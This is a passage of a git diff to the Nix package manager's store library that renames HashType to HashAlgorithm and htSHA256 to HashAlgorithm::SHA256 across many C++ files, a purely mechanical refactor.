StorePathSet & references) override; StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override; + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override; StorePath addTextToStore( std::string_view name, diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 
198402ff7..4c3dc1f5c 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1066,7 +1066,7 @@ void LocalDerivationGoal::initTmpDir() { if (passAsFile.find(i.first) == passAsFile.end()) { env[i.first] = i.second; } else { - auto hash = hashString(htSHA256, i.first); + auto hash = hashString(HashAlgorithm::SHA256, i.first); std::string fn = ".attr-" + hash.to_string(HashFormat::Base32, false); Path p = tmpDir + "/" + fn; writeFile(p, rewriteStrings(i.second, inputRewrites)); @@ -1290,13 +1290,13 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In { throw Error("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override { throw Error("addToStore"); } void addToStore(const ValidPathInfo & info, Source & narSource, @@ -1318,12 +1318,12 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In } StorePath addToStoreFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashType hashAlgo, - RepairFlag repair, - const StorePathSet & references) override + Source & dump, + std::string_view name, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + RepairFlag repair, + const StorePathSet & references) override { auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, repair, references); goal.addDependency(path); @@ -2466,7 +2466,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() rewriteOutput(outputRewrites); /* FIXME optimize and deduplicate with addToStore */ std::string oldHashPart { scratchPath->hashPart() }; - HashModuloSink caSink { 
outputHash.hashType, oldHashPart }; + HashModuloSink caSink {outputHash.hashAlgo, oldHashPart }; std::visit(overloaded { [&](const TextIngestionMethod &) { readFile(actualPath, caSink); @@ -2511,7 +2511,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string(newInfo0.path.hashPart())}}); } - HashResult narHashAndSize = hashPath(htSHA256, actualPath); + HashResult narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); newInfo0.narHash = narHashAndSize.first; newInfo0.narSize = narHashAndSize.second; @@ -2531,7 +2531,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string { scratchPath->hashPart() }, std::string { requiredFinalPath.hashPart() }); rewriteOutput(outputRewrites); - auto narHashAndSize = hashPath(htSHA256, actualPath); + auto narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); ValidPathInfo newInfo0 { requiredFinalPath, narHashAndSize.first }; newInfo0.narSize = narHashAndSize.second; auto refs = rewriteRefs(); @@ -2546,7 +2546,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { .method = dof.ca.method, - .hashType = wanted.type, + .hashAlgo = wanted.algo, }); /* Check wanted hash */ @@ -2583,7 +2583,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() [&](const DerivationOutput::Impure & doi) { return newInfoFromCA(DerivationOutput::CAFloating { .method = doi.method, - .hashType = doi.hashType, + .hashAlgo = doi.hashAlgo, }); }, @@ -2945,7 +2945,7 @@ StorePath LocalDerivationGoal::makeFallbackPath(OutputNameView outputName) { return worker.store.makeStorePath( "rewrite:" + std::string(drvPath.to_string()) + ":name:" + std::string(outputName), - Hash(htSHA256), outputPathName(drv->name, outputName)); + Hash(HashAlgorithm::SHA256), outputPathName(drv->name, outputName)); } @@ -2953,7 +2953,7 @@ StorePath LocalDerivationGoal::makeFallbackPath(const StorePath & path) { return worker.store.makeStorePath( "rewrite:" + 
std::string(drvPath.to_string()) + ":" + std::string(path.to_string()), - Hash(htSHA256), path.name()); + Hash(HashAlgorithm::SHA256), path.name()); } diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 01f52e7ab..9b8c36286 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -519,8 +519,8 @@ bool Worker::pathContentsGood(const StorePath & path) if (!pathExists(store.printStorePath(path))) res = false; else { - HashResult current = hashPath(info->narHash.type, store.printStorePath(path)); - Hash nullHash(htSHA256); + HashResult current = hashPath(info->narHash.algo, store.printStorePath(path)); + Hash nullHash(HashAlgorithm::SHA256); res = info->narHash == nullHash || info->narHash == current.first; } pathContentsGoodCache.insert_or_assign(path, res); diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index 357800333..2086bd0b9 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -63,9 +63,9 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) for (auto hashedMirror : settings.hashedMirrors.get()) try { if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/'; - std::optional ht = parseHashTypeOpt(getAttr("outputHashAlgo")); + std::optional ht = parseHashAlgoOpt(getAttr("outputHashAlgo")); Hash h = newHashAllowEmpty(getAttr("outputHash"), ht); - fetch(hashedMirror + printHashType(h.type) + "/" + h.to_string(HashFormat::Base16, false)); + fetch(hashedMirror + printHashAlgo(h.algo) + "/" + h.to_string(HashFormat::Base16, false)); return; } catch (Error & e) { debug(e.what()); diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc index a5f7cdf81..de8194f73 100644 --- a/src/libstore/content-address.cc +++ b/src/libstore/content-address.cc @@ -38,14 +38,14 @@ ContentAddressMethod ContentAddressMethod::parsePrefix(std::string_view & m) return FileIngestionMethod::Flat; } -std::string 
ContentAddressMethod::render(HashType ht) const +std::string ContentAddressMethod::render(HashAlgorithm ha) const { return std::visit(overloaded { [&](const TextIngestionMethod & th) { - return std::string{"text:"} + printHashType(ht); + return std::string{"text:"} + printHashAlgo(ha); }, [&](const FileIngestionMethod & fim) { - return "fixed:" + makeFileIngestionPrefix(fim) + printHashType(ht); + return "fixed:" + makeFileIngestionPrefix(fim) + printHashAlgo(ha); } }, raw); } @@ -67,7 +67,7 @@ std::string ContentAddress::render() const /** * Parses content address strings up to the hash. */ -static std::pair parseContentAddressMethodPrefix(std::string_view & rest) +static std::pair parseContentAddressMethodPrefix(std::string_view & rest) { std::string_view wholeInput { rest }; @@ -83,27 +83,27 @@ static std::pair parseContentAddressMethodPrefix auto hashTypeRaw = splitPrefixTo(rest, ':'); if (!hashTypeRaw) throw UsageError("content address hash must be in form ':', but found: %s", wholeInput); - HashType hashType = parseHashType(*hashTypeRaw); - return hashType; + HashAlgorithm hashAlgo = parseHashAlgo(*hashTypeRaw); + return hashAlgo; }; // Switch on prefix if (prefix == "text") { // No parsing of the ingestion method, "text" only support flat. - HashType hashType = parseHashType_(); + HashAlgorithm hashAlgo = parseHashType_(); return { TextIngestionMethod {}, - std::move(hashType), + std::move(hashAlgo), }; } else if (prefix == "fixed") { // Parse method auto method = FileIngestionMethod::Flat; if (splitPrefix(rest, "r:")) method = FileIngestionMethod::Recursive; - HashType hashType = parseHashType_(); + HashAlgorithm hashAlgo = parseHashType_(); return { std::move(method), - std::move(hashType), + std::move(hashAlgo), }; } else throw UsageError("content address prefix '%s' is unrecognized. 
Recogonized prefixes are 'text' or 'fixed'", prefix); @@ -113,15 +113,15 @@ ContentAddress ContentAddress::parse(std::string_view rawCa) { auto rest = rawCa; - auto [caMethod, hashType] = parseContentAddressMethodPrefix(rest); + auto [caMethod, hashAlgo] = parseContentAddressMethodPrefix(rest); return ContentAddress { .method = std::move(caMethod), - .hash = Hash::parseNonSRIUnprefixed(rest, hashType), + .hash = Hash::parseNonSRIUnprefixed(rest, hashAlgo), }; } -std::pair ContentAddressMethod::parse(std::string_view caMethod) +std::pair ContentAddressMethod::parse(std::string_view caMethod) { std::string asPrefix = std::string{caMethod} + ":"; // parseContentAddressMethodPrefix takes its argument by reference @@ -144,7 +144,7 @@ std::string renderContentAddress(std::optional ca) std::string ContentAddress::printMethodAlgo() const { return method.renderPrefix() - + printHashType(hash.type); + + printHashAlgo(hash.algo); } bool StoreReferences::empty() const diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh index bdb558907..05234da38 100644 --- a/src/libstore/content-address.hh +++ b/src/libstore/content-address.hh @@ -94,7 +94,7 @@ struct ContentAddressMethod /** * Parse a content addressing method and hash type. */ - static std::pair parse(std::string_view rawCaMethod); + static std::pair parse(std::string_view rawCaMethod); /** * Render a content addressing method and hash type in a @@ -102,7 +102,7 @@ struct ContentAddressMethod * * The rough inverse of `parse()`. 
*/ - std::string render(HashType ht) const; + std::string render(HashAlgorithm ha) const; }; diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index be9b0b0d3..530b1a178 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -400,22 +400,22 @@ static void performOp(TunnelLogger * logger, ref store, logger->startWork(); auto pathInfo = [&]() { // NB: FramedSource must be out of scope before logger->stopWork(); - auto [contentAddressMethod, hashType_] = ContentAddressMethod::parse(camStr); - auto hashType = hashType_; // work around clang bug + auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parse(camStr); + auto hashAlgo = hashAlgo_; // work around clang bug FramedSource source(from); // TODO this is essentially RemoteStore::addCAToStore. Move it up to Store. return std::visit(overloaded { [&](const TextIngestionMethod &) { - if (hashType != htSHA256) + if (hashAlgo != HashAlgorithm::SHA256) throw UnimplementedError("When adding text-hashed data called '%s', only SHA-256 is supported but '%s' was given", - name, printHashType(hashType)); + name, printHashAlgo(hashAlgo)); // We could stream this by changing Store std::string contents = source.drain(); auto path = store->addTextToStore(name, contents, refs, repair); return store->queryPathInfo(path); }, [&](const FileIngestionMethod & fim) { - auto path = store->addToStoreFromDump(source, name, fim, hashType, repair, refs); + auto path = store->addToStoreFromDump(source, name, fim, hashAlgo, repair, refs); return store->queryPathInfo(path); }, }, contentAddressMethod.raw); @@ -424,7 +424,7 @@ static void performOp(TunnelLogger * logger, ref store, WorkerProto::Serialise::write(*store, wconn, *pathInfo); } else { - HashType hashAlgo; + HashAlgorithm hashAlgo; std::string baseName; FileIngestionMethod method; { @@ -440,7 +440,7 @@ static void performOp(TunnelLogger * logger, ref store, hashAlgoRaw = "sha256"; method = FileIngestionMethod::Recursive; } - hashAlgo = 
parseHashType(hashAlgoRaw); + hashAlgo = parseHashAlgo(hashAlgoRaw); } auto dumpSource = sinkToSource([&](Sink & saved) { @@ -883,7 +883,7 @@ static void performOp(TunnelLogger * logger, ref store, bool repair, dontCheckSigs; auto path = store->parseStorePath(readString(from)); auto deriver = readString(from); - auto narHash = Hash::parseAny(readString(from), htSHA256); + auto narHash = Hash::parseAny(readString(from), HashAlgorithm::SHA256); ValidPathInfo info { path, narHash }; if (deriver != "") info.deriver = store->parseStorePath(deriver); diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index dd87203b8..c68631c1a 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -215,25 +215,25 @@ static StringSet parseStrings(std::istream & str, bool arePaths) static DerivationOutput parseDerivationOutput( const StoreDirConfig & store, - std::string_view pathS, std::string_view hashAlgo, std::string_view hashS, + std::string_view pathS, std::string_view hashAlgoStr, std::string_view hashS, const ExperimentalFeatureSettings & xpSettings) { - if (hashAlgo != "") { - ContentAddressMethod method = ContentAddressMethod::parsePrefix(hashAlgo); + if (hashAlgoStr != "") { + ContentAddressMethod method = ContentAddressMethod::parsePrefix(hashAlgoStr); if (method == TextIngestionMethod {}) xpSettings.require(Xp::DynamicDerivations); - const auto hashType = parseHashType(hashAlgo); + const auto hashAlgo = parseHashAlgo(hashAlgoStr); if (hashS == "impure") { xpSettings.require(Xp::ImpureDerivations); if (pathS != "") throw FormatError("impure derivation output should not specify output path"); return DerivationOutput::Impure { .method = std::move(method), - .hashType = std::move(hashType), + .hashAlgo = std::move(hashAlgo), }; } else if (hashS != "") { validatePath(pathS); - auto hash = Hash::parseNonSRIUnprefixed(hashS, hashType); + auto hash = Hash::parseNonSRIUnprefixed(hashS, hashAlgo); return DerivationOutput::CAFixed { .ca = 
ContentAddress { .method = std::move(method), @@ -246,7 +246,7 @@ static DerivationOutput parseDerivationOutput( throw FormatError("content-addressed derivation output should not specify output path"); return DerivationOutput::CAFloating { .method = std::move(method), - .hashType = std::move(hashType), + .hashAlgo = std::move(hashAlgo), }; } } else { @@ -547,7 +547,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs, }, [&](const DerivationOutput::CAFloating & dof) { s += ','; printUnquotedString(s, ""); - s += ','; printUnquotedString(s, dof.method.renderPrefix() + printHashType(dof.hashType)); + s += ','; printUnquotedString(s, dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo)); s += ','; printUnquotedString(s, ""); }, [&](const DerivationOutput::Deferred &) { @@ -558,7 +558,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs, [&](const DerivationOutput::Impure & doi) { // FIXME s += ','; printUnquotedString(s, ""); - s += ','; printUnquotedString(s, doi.method.renderPrefix() + printHashType(doi.hashType)); + s += ','; printUnquotedString(s, doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo)); s += ','; printUnquotedString(s, "impure"); } }, i.second.raw); @@ -631,7 +631,7 @@ DerivationType BasicDerivation::type() const floatingCAOutputs, deferredIAOutputs, impureOutputs; - std::optional floatingHashType; + std::optional floatingHashAlgo; for (auto & i : outputs) { std::visit(overloaded { @@ -643,10 +643,10 @@ DerivationType BasicDerivation::type() const }, [&](const DerivationOutput::CAFloating & dof) { floatingCAOutputs.insert(i.first); - if (!floatingHashType) { - floatingHashType = dof.hashType; + if (!floatingHashAlgo) { + floatingHashAlgo = dof.hashAlgo; } else { - if (*floatingHashType != dof.hashType) + if (*floatingHashAlgo != dof.hashAlgo) throw Error("all floating outputs must use the same hash type"); } }, @@ -774,7 +774,7 @@ DrvHash hashDerivationModulo(Store & store, const 
Derivation & drv, bool maskOut std::map outputHashes; for (const auto & i : drv.outputs) { auto & dof = std::get(i.second.raw); - auto hash = hashString(htSHA256, "fixed:out:" + auto hash = hashString(HashAlgorithm::SHA256, "fixed:out:" + dof.ca.printMethodAlgo() + ":" + dof.ca.hash.to_string(HashFormat::Base16, false) + ":" + store.printStorePath(dof.path(store, drv.name, i.first))); @@ -825,7 +825,7 @@ DrvHash hashDerivationModulo(Store & store, const Derivation & drv, bool maskOut } } - auto hash = hashString(htSHA256, drv.unparse(store, maskOutputs, &inputs2)); + auto hash = hashString(HashAlgorithm::SHA256, drv.unparse(store, maskOutputs, &inputs2)); std::map outputHashes; for (const auto & [outputName, _] : drv.outputs) { @@ -930,7 +930,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva }, [&](const DerivationOutput::CAFloating & dof) { out << "" - << (dof.method.renderPrefix() + printHashType(dof.hashType)) + << (dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo)) << ""; }, [&](const DerivationOutput::Deferred &) { @@ -940,7 +940,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva }, [&](const DerivationOutput::Impure & doi) { out << "" - << (doi.method.renderPrefix() + printHashType(doi.hashType)) + << (doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo)) << "impure"; }, }, i.second.raw); @@ -958,7 +958,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva std::string hashPlaceholder(const OutputNameView outputName) { // FIXME: memoize? 
- return "/" + hashString(htSHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Base32, false); + return "/" + hashString(HashAlgorithm::SHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Base32, false); } @@ -1150,7 +1150,7 @@ void Derivation::checkInvariants(Store & store, const StorePath & drvPath) const } -const Hash impureOutputHash = hashString(htSHA256, "impure"); +const Hash impureOutputHash = hashString(HashAlgorithm::SHA256, "impure"); nlohmann::json DerivationOutput::toJSON( const StoreDirConfig & store, std::string_view drvName, OutputNameView outputName) const @@ -1167,11 +1167,11 @@ nlohmann::json DerivationOutput::toJSON( // FIXME print refs? }, [&](const DerivationOutput::CAFloating & dof) { - res["hashAlgo"] = dof.method.renderPrefix() + printHashType(dof.hashType); + res["hashAlgo"] = dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo); }, [&](const DerivationOutput::Deferred &) {}, [&](const DerivationOutput::Impure & doi) { - res["hashAlgo"] = doi.method.renderPrefix() + printHashType(doi.hashType); + res["hashAlgo"] = doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo); res["impure"] = true; }, }, raw); @@ -1191,15 +1191,15 @@ DerivationOutput DerivationOutput::fromJSON( for (const auto & [key, _] : json) keys.insert(key); - auto methodAlgo = [&]() -> std::pair { - std::string hashAlgo = json["hashAlgo"]; + auto methodAlgo = [&]() -> std::pair { + std::string hashAlgoStr = json["hashAlgo"]; // remaining to parse, will be mutated by parsers - std::string_view s = hashAlgo; + std::string_view s = hashAlgoStr; ContentAddressMethod method = ContentAddressMethod::parsePrefix(s); if (method == TextIngestionMethod {}) xpSettings.require(Xp::DynamicDerivations); - auto hashType = parseHashType(s); - return { std::move(method), std::move(hashType) }; + auto hashAlgo = parseHashAlgo(s); + return { std::move(method), std::move(hashAlgo) }; }; if (keys == (std::set { "path" })) { @@ -1209,11 +1209,11 @@ 
DerivationOutput DerivationOutput::fromJSON( } else if (keys == (std::set { "path", "hashAlgo", "hash" })) { - auto [method, hashType] = methodAlgo(); + auto [method, hashAlgo] = methodAlgo(); auto dof = DerivationOutput::CAFixed { .ca = ContentAddress { .method = std::move(method), - .hash = Hash::parseNonSRIUnprefixed((std::string) json["hash"], hashType), + .hash = Hash::parseNonSRIUnprefixed((std::string) json["hash"], hashAlgo), }, }; if (dof.path(store, drvName, outputName) != store.parseStorePath((std::string) json["path"])) @@ -1223,10 +1223,10 @@ DerivationOutput DerivationOutput::fromJSON( else if (keys == (std::set { "hashAlgo" })) { xpSettings.require(Xp::CaDerivations); - auto [method, hashType] = methodAlgo(); + auto [method, hashAlgo] = methodAlgo(); return DerivationOutput::CAFloating { .method = std::move(method), - .hashType = std::move(hashType), + .hashAlgo = std::move(hashAlgo), }; } @@ -1236,10 +1236,10 @@ DerivationOutput DerivationOutput::fromJSON( else if (keys == (std::set { "hashAlgo", "impure" })) { xpSettings.require(Xp::ImpureDerivations); - auto [method, hashType] = methodAlgo(); + auto [method, hashAlgo] = methodAlgo(); return DerivationOutput::Impure { .method = std::move(method), - .hashType = hashType, + .hashAlgo = hashAlgo, }; } diff --git a/src/libstore/derivations.hh b/src/libstore/derivations.hh index 219e8e7d7..290abedcf 100644 --- a/src/libstore/derivations.hh +++ b/src/libstore/derivations.hh @@ -75,9 +75,9 @@ struct DerivationOutput /** * How the serialization will be hashed */ - HashType hashType; + HashAlgorithm hashAlgo; - GENERATE_CMP(CAFloating, me->method, me->hashType); + GENERATE_CMP(CAFloating, me->method, me->hashAlgo); }; /** @@ -102,9 +102,9 @@ struct DerivationOutput /** * How the serialization will be hashed */ - HashType hashType; + HashAlgorithm hashAlgo; - GENERATE_CMP(Impure, me->method, me->hashType); + GENERATE_CMP(Impure, me->method, me->hashAlgo); }; typedef std::variant< diff --git 
a/src/libstore/downstream-placeholder.cc b/src/libstore/downstream-placeholder.cc index ca9f7476e..10df37fa4 100644 --- a/src/libstore/downstream-placeholder.cc +++ b/src/libstore/downstream-placeholder.cc @@ -19,7 +19,7 @@ DownstreamPlaceholder DownstreamPlaceholder::unknownCaOutput( auto drvName = drvNameWithExtension.substr(0, drvNameWithExtension.size() - 4); auto clearText = "nix-upstream-output:" + std::string { drvPath.hashPart() } + ":" + outputPathName(drvName, outputName); return DownstreamPlaceholder { - hashString(htSHA256, clearText) + hashString(HashAlgorithm::SHA256, clearText) }; } @@ -34,7 +34,7 @@ DownstreamPlaceholder DownstreamPlaceholder::unknownDerivation( + compressed.to_string(HashFormat::Base32, false) + ":" + std::string { outputName }; return DownstreamPlaceholder { - hashString(htSHA256, clearText) + hashString(HashAlgorithm::SHA256, clearText) }; } diff --git a/src/libstore/export-import.cc b/src/libstore/export-import.cc index 52130f8f6..48718ef84 100644 --- a/src/libstore/export-import.cc +++ b/src/libstore/export-import.cc @@ -30,7 +30,7 @@ void Store::exportPath(const StorePath & path, Sink & sink) { auto info = queryPathInfo(path); - HashSink hashSink(htSHA256); + HashSink hashSink(HashAlgorithm::SHA256); TeeSink teeSink(sink, hashSink); narFromPath(path, teeSink); @@ -39,7 +39,7 @@ void Store::exportPath(const StorePath & path, Sink & sink) filesystem corruption from spreading to other machines. Don't complain if the stored hash is zero (unknown). 
*/ Hash hash = hashSink.currentHash().first; - if (hash != info->narHash && info->narHash != Hash(info->narHash.type)) + if (hash != info->narHash && info->narHash != Hash(info->narHash.algo)) throw Error("hash of path '%s' has changed from '%s' to '%s'!", printStorePath(path), info->narHash.to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true)); @@ -79,7 +79,7 @@ StorePaths Store::importPaths(Source & source, CheckSigsFlag checkSigs) auto references = CommonProto::Serialise::read(*this, CommonProto::ReadConn { .from = source }); auto deriver = readString(source); - auto narHash = hashString(htSHA256, saved.s); + auto narHash = hashString(HashAlgorithm::SHA256, saved.s); ValidPathInfo info { path, narHash }; if (deriver != "") diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 93fa60682..5c413aa77 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -50,7 +50,7 @@ static void makeSymlink(const Path & link, const Path & target) void LocalStore::addIndirectRoot(const Path & path) { - std::string hash = hashString(htSHA1, path).to_string(HashFormat::Base32, false); + std::string hash = hashString(HashAlgorithm::SHA1, path).to_string(HashFormat::Base32, false); Path realRoot = canonPath(fmt("%1%/%2%/auto/%3%", stateDir, gcRootsDir, hash)); makeSymlink(realRoot, path); } diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 731457354..fb1580dd6 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -267,13 +267,13 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor { unsupported("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & 
filter, + RepairFlag repair, + const StorePathSet & references) override { unsupported("addToStore"); } StorePath addTextToStore( diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index c8962f574..ef7dd7985 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -955,7 +955,7 @@ void LocalStore::registerValidPaths(const ValidPathInfos & infos) StorePathSet paths; for (auto & [_, i] : infos) { - assert(i.narHash.type == htSHA256); + assert(i.narHash.algo == HashAlgorithm::SHA256); if (isValidPath_(*state, i.path)) updatePathInfo(*state, i); else @@ -1069,7 +1069,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, /* While restoring the path from the NAR, compute the hash of the NAR. */ - HashSink hashSink(htSHA256); + HashSink hashSink(HashAlgorithm::SHA256); TeeSource wrapperSource { source, hashSink }; @@ -1090,7 +1090,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, auto & specified = *info.ca; auto actualHash = hashCAPath( specified.method, - specified.hash.type, + specified.hash.algo, info.path ); if (specified.hash != actualHash.hash) { @@ -1116,7 +1116,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) { /* For computing the store path. */ auto hashSink = std::make_unique(hashAlgo); @@ -1220,8 +1220,8 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name /* For computing the nar hash. In recursive SHA-256 mode, this is the same as the store hash, so no need to do it again. 
*/ auto narHash = std::pair { hash, size }; - if (method != FileIngestionMethod::Recursive || hashAlgo != htSHA256) { - HashSink narSink { htSHA256 }; + if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) { + HashSink narSink { HashAlgorithm::SHA256 }; dumpPath(realPath, narSink); narHash = narSink.finish(); } @@ -1252,7 +1252,7 @@ StorePath LocalStore::addTextToStore( std::string_view s, const StorePathSet & references, RepairFlag repair) { - auto hash = hashString(htSHA256, s); + auto hash = hashString(HashAlgorithm::SHA256, s); auto dstPath = makeTextPath(name, TextInfo { .hash = hash, .references = references, @@ -1278,7 +1278,7 @@ StorePath LocalStore::addTextToStore( StringSink sink; dumpString(s, sink); - auto narHash = hashString(htSHA256, sink.s); + auto narHash = hashString(HashAlgorithm::SHA256, sink.s); optimisePath(realPath, repair); @@ -1389,7 +1389,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) for (auto & link : readDirectory(linksDir)) { printMsg(lvlTalkative, "checking contents of '%s'", link.name); Path linkPath = linksDir + "/" + link.name; - std::string hash = hashPath(htSHA256, linkPath).first.to_string(HashFormat::Base32, false); + std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Base32, false); if (hash != link.name) { printError("link '%s' was modified! expected hash '%s', got '%s'", linkPath, link.name, hash); @@ -1406,7 +1406,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) printInfo("checking store hashes..."); - Hash nullHash(htSHA256); + Hash nullHash(HashAlgorithm::SHA256); for (auto & i : validPaths) { try { @@ -1415,7 +1415,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) /* Check the content hash (optionally - slow). 
*/ printMsg(lvlTalkative, "checking contents of '%s'", printStorePath(i)); - auto hashSink = HashSink(info->narHash.type); + auto hashSink = HashSink(info->narHash.algo); dumpPath(Store::toRealPath(i), hashSink); auto current = hashSink.finish(); @@ -1697,20 +1697,20 @@ void LocalStore::queryRealisationUncached(const DrvOutput & id, } ContentAddress LocalStore::hashCAPath( - const ContentAddressMethod & method, const HashType & hashType, + const ContentAddressMethod & method, const HashAlgorithm & hashAlgo, const StorePath & path) { - return hashCAPath(method, hashType, Store::toRealPath(path), path.hashPart()); + return hashCAPath(method, hashAlgo, Store::toRealPath(path), path.hashPart()); } ContentAddress LocalStore::hashCAPath( const ContentAddressMethod & method, - const HashType & hashType, + const HashAlgorithm & hashAlgo, const Path & path, const std::string_view pathHash ) { - HashModuloSink caSink ( hashType, std::string(pathHash) ); + HashModuloSink caSink ( hashAlgo, std::string(pathHash) ); std::visit(overloaded { [&](const TextIngestionMethod &) { readFile(path, caSink); diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh index 8f0ffd2a2..ee605b5a2 100644 --- a/src/libstore/local-store.hh +++ b/src/libstore/local-store.hh @@ -178,7 +178,7 @@ public: RepairFlag repair, CheckSigsFlag checkSigs) override; StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) override; + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; StorePath addTextToStore( std::string_view name, @@ -353,12 +353,12 @@ private: // XXX: Make a generic `Store` method ContentAddress hashCAPath( const ContentAddressMethod & method, - const HashType & hashType, + const HashAlgorithm & hashAlgo, const StorePath & path); ContentAddress hashCAPath( const ContentAddressMethod & method, - const 
HashType & hashType, + const HashAlgorithm & hashAlgo, const Path & path, const std::string_view pathHash ); diff --git a/src/libstore/make-content-addressed.cc b/src/libstore/make-content-addressed.cc index 253609ed2..170fe67b9 100644 --- a/src/libstore/make-content-addressed.cc +++ b/src/libstore/make-content-addressed.cc @@ -43,7 +43,7 @@ std::map makeContentAddressed( sink.s = rewriteStrings(sink.s, rewrites); - HashModuloSink hashModuloSink(htSHA256, oldHashPart); + HashModuloSink hashModuloSink(HashAlgorithm::SHA256, oldHashPart); hashModuloSink(sink.s); auto narModuloHash = hashModuloSink.finish().first; @@ -66,7 +66,7 @@ std::map makeContentAddressed( rsink2(sink.s); rsink2.flush(); - info.narHash = hashString(htSHA256, sink2.s); + info.narHash = hashString(HashAlgorithm::SHA256, sink2.s); info.narSize = sink.s.size(); StringSource source(sink2.s); diff --git a/src/libstore/nar-info.cc b/src/libstore/nar-info.cc index 1060a6c8b..25e2a7d7b 100644 --- a/src/libstore/nar-info.cc +++ b/src/libstore/nar-info.cc @@ -113,10 +113,10 @@ std::string NarInfo::to_string(const Store & store) const res += "URL: " + url + "\n"; assert(compression != ""); res += "Compression: " + compression + "\n"; - assert(fileHash && fileHash->type == htSHA256); + assert(fileHash && fileHash->algo == HashAlgorithm::SHA256); res += "FileHash: " + fileHash->to_string(HashFormat::Base32, true) + "\n"; res += "FileSize: " + std::to_string(fileSize) + "\n"; - assert(narHash.type == htSHA256); + assert(narHash.algo == HashAlgorithm::SHA256); res += "NarHash: " + narHash.to_string(HashFormat::Base32, true) + "\n"; res += "NarSize: " + std::to_string(narSize) + "\n"; diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index 0fa977545..cadf88347 100644 --- 